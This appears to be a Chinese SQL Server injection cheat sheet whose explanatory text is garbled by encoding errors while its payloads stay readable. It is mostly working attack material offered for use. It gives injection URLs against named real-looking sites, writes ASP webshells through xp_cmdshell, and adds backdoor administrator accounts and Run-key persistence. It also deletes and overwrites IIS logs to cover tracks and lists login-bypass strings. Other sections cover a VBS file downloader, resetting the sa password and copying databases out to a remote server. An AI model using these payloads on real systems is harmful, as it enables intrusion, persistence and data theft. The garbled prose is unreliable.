SQLע
1^תַдASP(һ仰ľ)ļķ:http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2ʾSQLϵͳ汾
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
3SQLпʹáinؼֽвѯ硰select * from mytable where id in(1)еֵύݣĽʹáselect * from mytable where id=1IJѯȫͬԷҳʱURLϡ) and 1=1 and 1 in(1ԭSQLͱˡselect * from mytable where id in(1) and 1=1 and 1 in(1)ͻڴѾõҳˡҾͽ͵©Ϊ͡ɣһ뵽˻Сַ͡ءˣơselect * from mytable where name in('firstsee')IJѯɵġ
4жxp_cmdshellչ洢Ƿڣ
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
5ָxp_cmdshellչ洢
http://www.test.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
6дкִг
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
7鿴ǰݿƣ
http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) nij0,1,2,3ͿԿ
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
8гǰеݿƣ
select * from master.dbo.sysdatabases геļ¼
select name from master.dbo.sysdatabases гnameеļ¼
[ȡȫݿ]
select name from master.dbo.sysdatabases where dbid=7 //dbidֵΪ7϶ûݿ
[ݱ][ֵֶΪ뷨ֶεֵͿɵõ]
select top 1 name from ݿ.dbo.sysobjects where xtype='u' and status>0 and name not in('table')
[ݱֶ][ֵֶΪֶ뷨ֶεֵͿɵõֶ]
select top 1 ݿ.dbo.col_name(object_id('Ҫѯݱ'),ֶ:1) [ where ]
9xp_cmdshell֧ע©SQLCMD
------------------------------------------------------------------------ͣ
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--עrunIJtrueָǽȴеĽpingijʱʹô˲
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--ΪfsoopentextfileһtextstreamԴʱ@fileһ
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
-------------------------------------------------------------------------(£
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
10һ潫WEBûӵԱУ
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
11һִEXE
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
12SQLִCMDķ
ɾ7.18־
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)ȿjetɳģʽͨչ洢xp_regwriteעʵ֣ԱעԤԭڰȫԭĬɳģʽδΪʲôҪxp_regwriteԭxp_regwriteҪDB_OWNERȨޣΪ˷㣬ィʹsysadminȨԣ
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
ע
0 ֹһУĬϣ
1 ʹܷACCESSǽֹ
2 ֹACCESSʹ
3 ʹһ
sysadminȨʹõ
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
ݿ'L0op8ack'ο
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
13ʹݿ⣺
ʹʽִУǺܲңDB_OWNERȨDzģҪsysadminȨsecurityadmin+setupadminȨ
sp_addlinkedserverҪsysadminsetupadminȨ
sp_addlinkedsrvloginҪsysadminsecurityadminȨ
շ֣saȨsetupadmin+securityadminȨʻʹã
һûĸԱôͨʻȨ
ʵԲǿΪһѧϰܽ
¹£sysadminôIAS.mdbȨ֤
ҲԵʱhackerûsetupadmin+securityadminȨޣʹias.mdbʧ
Ҫһһûɷʵmdbſԣ
½ӷL0op8ack: EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
exec sp_addlinkedsrvlogin 'L0op8ack','false';--
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
exec sp_droplinkedsrvlogin 'L0op8ack','false';--
exec sp_dropserver 'L0op8ack';--
ٿһļ7.18ļ
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
14update±еݣ
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
wwwû16λMD5ֵΪa0b923820dcc509aij1
32λMD5ֵΪ Ϊ
15ñݵļ
SQLBCPѱݵıļŵָλáܣǿȽһʱȻڱһһеһASPľȻBCPγASPļ
иʽ£
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp Cc CS localhost CU sa CP upload('S'Ϊִвѯķ'U'Ϊû'P'Ϊ룬ϴһruncommand.aspľ)
16ݺͶȡݵķ
' and 1=1 union select 1,2,3,4;create table .((255))--
ﲥݣ
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
ӱȡݣ
' and 1=(select count(*) from cyfd where gyfd >1)--
ɾʱ
';drop table cyfd;--
16ͨSQLֱӸsa룺
update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,saͱǸij111111ǺǣķǰsaɾôɾԲοҵġȫɾsaš
17 鿴еݿû
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
19 sasqlۺùӺִ
exec sp_password NULL,'','sa'
20ѯdvbbsеıͱṹ
select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
select * from dvbbs.dbo.syscolumns where id=1426104121
21ֹݵǰݿ⣺
ȫݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
챸ݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT
22ӺɾһSAȨûtest
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
23гChouYFDеûı
select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
24гrdwebбеֶ
http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns where id=1234
select * from dvbbs.dbo.syscolumns where id=5575058
гdvbbsбid=5575058ֶ
25ɾ¼delete from Dv_topic where boardid=5 and topicid=7978
26ƹ¼̨֤ķ
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6or 1=1--
7 or 'a='a
8" or "a"="a
9 ') or ('a'='a
10 ") or ("a"="a
11 or (1=1
12) 'or''='
13) %' and 1=1 and '%'='
27Ѱվ·ķܣ
1鿴WEBվװĿ¼
cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 21345ԣ
type c:\test1.txt
del c:\test1.txt
NBSI¿ֱʾнԲõļ
2վҵһͼƬ 123.jpg
Ȼд123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt
ִк type c:\123.txt
վ·
3SQLվͬһϣǿִǰɣ
ִ
%windir%\help\iishelp\common\404b.htm500.asp
עǰBackupļ
磺
dir c:\ >%windir%\help\iishelp\common\404b.htm
Ȼһļʣhttp://Ŀip/2.asp
4win2000ϵͳxp_regreadȡHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots ȡWEB·
2003ϵͳxp_regreadȡδҵ
磺
1 ½һcyfd(ֶΪgyfd)http://www.cnwill.com/NewsShow.aspx?id=4844;create table .((255))--
2 web·дȥ:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
3 ƥ䣬ʾ:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: varchar ֵ 'Y:\Web\̨˲ߺ̨ϵͳ,,201 ' תΪΪ int ʱ
TargeSite: Boolean Read() ·¶ˡ
4ɾ:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
5regeditעĽ·%windir%\help\iishelp\common\404b.htm500.aspҳ
regedit˵
Regedit /L:system /R:user /E filename.reg Regpath
壺
/LsystemָSystem.datļڵ·
/RuserָUser.datļڵ·
/E˲ָע༭Ҫеעڴ˲һ뵼עļ
RegpathָҪĸעķָ֧ȫע֧ЩУ"/Lsystem""/Ruser"ǿѡʹע༭ΪǶWINDOWSĿ¼µ"system.dat""user.dat"ļвͨDOSôͱʹ"/L""/R"ָ"system.dat""user.dat"ļľ·ע༭ҵǡ˵ͨ̽DOSע"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",˼ǰעݵWINDOWSĿ¼£ļΪ"regedit.reg""regedit /E D:\regedit.reg"˵עݵD̵ĸĿ¼£ʡ"/L""/R"ļΪ"Regedit.reg"
regedit /s c:\adam.reg c:\adam.regļע
regedit /e c:\web.reg ȫעݵc:\web.regУ
win2000ϵͳC:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Ȼhttp://ĿIP/2.asp
win2003ϵͳûҵϣҵѹһۡ
6%SystemRoot%\system32\inetsrv\MetaBack\µļiisıļwebûʵģiisݵwebshellü±ԻȡӦweb·
7SQLע뽨Ŀ¼dboȨҲweb·һֽ취
Ǻܶ¶SQLעĿ¼ȴܲҵwebĿ¼ҲͲõõһwebshellһв
? Ŀ¼win,ָc:\winnt\system32exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
? winĿ¼нaspűȨޣexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" Cs:'
? ɾĿ¼winexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
? ԣhttp://127.0.0.1/win/test.asp
8SQLWEBĿ¼ݾ飬WEBĿ¼˳ǣd̡e̡c̣ǽһʱڴmaster..xp_dirtree(ʺpublic)ɵĿ¼,䣺
;create table temp(dir nvarchar(255),depth varchar(255));--,ñdirֶαʾĿ¼ƣdepthֶαʾĿ¼ȡȻִxp_dirtreeD̵Ŀ¼£
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--
ڽIJǰȲ鿴DмļУDиµ˽⣬£
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM '))>=(=0123...)
ţڶԷվҼһĿ¼userphotoȻɸѡķжWEBĿ¼Ƿڴϣ£
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
ķؽΪ棬ʾWEBĿ¼пڴϣΪ˽һȷϣԼĿ¼
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
еIJԽΪ棬ʾWEBĿ¼пڴϡ
ҵWEBĿ¼ڴϣµһĿ¼ȣ
and (select depth from temp where dir='user')>=(=123...)
õdepth3,˵userĿ¼D̵3Ŀ¼WEBĿ¼D̵ĶĿ¼
ĿǰѾ֪˸Ŀ¼ڵ̷ȣҪҵĿ¼ľλãD̸Ŀ¼ʼһѰȻûбҪ֪ÿĿ¼ƣ̫ķʱˡ
⽨һʱD̵1Ŀ¼µĿ¼£
;create table temp1(dir nvarchar(255),depth varchar(255));--
ȻѴD̵ĵһĿ¼µĿ¼浽temp1У£
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
ȻҲD̵ĵڶĿ¼µĿ¼浽temp1Уֻѵڶtop 1Ϊtop 2ˡ
ڣtemp1ѾD̵һĿ¼µĿ¼,ȻͬķжϸĿ¼ǷڴһĿ¼£
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
Ϊ棬ʾĿ¼ڴĿ¼£סҪԼӣΪ٣WEBĿ¼ڴĿ¼£ȻͬķD̵23...Ŀ¼µĿ¼бжWEBĿ¼Ƿ¡ǣҪע⣬xp_dirtreeǰһҪtemp1еɾ
ڼ裬WEBĿ¼D̵ĵһĿ¼£Ŀ¼Ϊwebsite,Ŀ¼벻˵˰ɡΪǰ֪WEBĿ¼Ϊ2Ҫ֪websiteµĸWEBĿ¼
ڣͬķٽ3ʱ
;create table temp2(dir nvarchar(255),depth varchar(255));--
ȻѴD̵websiteµĿ¼浽temp2У£
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
ȻҲD̵websiteµڶĿ¼µĿ¼浽temp2Уֻѵڶtop 1Ϊtop 2ˡ
ڣͬķжϸĿ¼ǷΪĿ¼
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
Ϊ棬ΪȷǵжϣԼӣ涼ˣӶΪ棬ôȷ˸Ŀ¼ΪWEBĿ¼
ϵķϿԻWEBĿ¼ǼWEBĿ¼ǣD:\website\www
ȻǾͿԱݵǰݿĿ¼ءǰǰtemptemp1temp2գȻCDE̵Ŀ¼ֱ浽temptemp1temp2С
ݿҪǵðʱdropصݿпҵеĿ¼б̨Ŀ¼ԼϢ
28win2000½WEBûΪϵͳûȨޣҪйԱȨִУ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
鿴Ƿɹ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
Ȩ(C) Microsoft Corporation 1996-2001Ȩ
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
29ASPľ
DZĿ¼mkdir images..\
ASPľĿ¼copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
ͨwebASPľhttp://ip/images../news.asp?action=login
ɾDZĿ¼rmdir images..\ /s
30ȥtenlnetntlm֤
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'
31echoдļؽűiget.vbs:
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
32ֹIISĿ¼ķ
鿴Ŀ¼бcscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
½һkissĿ¼mkdir c:\asp\kiss
kissĿ¼cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
ΪkissĿ¼ִкдȨޣ
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
ʣhttp://127.0.0.1/kiss/test.asp
33ʹopenrowset()رԣ
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..') AS a
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..')
34
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
35ݿû
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
36ͨûWEBSHELLķ֮
EXEC .. 'c:\test.rar','default',1,'d:\cmd.asp'
ڵõwebshell
EXEC .. 'C:\test.rar','c:',1, 'n.asp'
ļݣҪmasterdboȨޣ
EXEC .. 1,'c:\cmd.asp'
37sa Ȩ֪web·ֱӱݿweb·
http://www.XXXX.com/FullStory.asp?id=1;backuup database ݿ to disk='c:\inetpub\wwwroot\save.db' ѵõȫݵWEBĿ¼£HTTPѴļ(ȻѡҪ֪WEBĿ¼)
ϵͳĿ¼ṹWEBĿ¼ȴһʱtemp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
ǿxp_availablemediaõǰ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
ǿͨѯtempбϢxp_subdirsĿ¼б,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
ǻxp_dirtreeĿ¼Ŀ¼ṹ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- ͿԳɹеĿ¼ļУб
Ҫ鿴ijļݣִͨxp_cmdsell;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
ʹ'bulk insert'Խһıļ뵽һʱС磺bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' tempͿԿindex.aspļˣͨASPļԵõϵͳϢWEBϢԵõSAʺŵ롣
38һЩsqlеչ洢ܽ:
xp_availablemedia ʾϵͳϿõ̷'C:\' xp_availablemedia
xp_enumgroups гǰϵͳʹȺ鼰˵ xp_enumgroups
xp_enumdsn гϵͳѾúõODBCԴ xp_enumdsn
xp_dirtree ʾijĿ¼µĿ¼ļܹ xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails ȡijļ xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab ĿѹijѹĵԽڲĺöŸ dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab ѹ xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains г xp_ntsec_enumdomains
xp_servicecontrol ֹͣij xp_servicecontrol 'stop','schedule'
xp_terminate_process pidֹͣijִеij xp_terminate_process 123
dbo.xp_subdirs ֻijĿ¼µĿ¼ dbo.xp_subdirs 'C:\'
39
USE MASTER
GO
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1еĴ洢̵Ľű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2еͼĽű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
40DB_OWNERȨµݿⱸݷ
openrowsetɡԼݿ~ڱؽĿһṹı~ֶʹnvarchar.ȻúӶԷSQLݿ⣬ڲѯִ
insert into OPENROWSET ('sqloledb','server=ݿIP;uid=user;pwd=pass;database=dbname;','select * from 㽨ı) select * from Էı
Ҫ̫ĻͿݿûԶŵֶ.select * from where id>100
Ū
ҪǺWEB̨ͬĻֱӽBAKWEBĿ¼»OKǰⲻ̫2GĻSQLͳʱ
SAȨASPݿ⣺ɷASPMSSQLݿ
ҳ:
[1]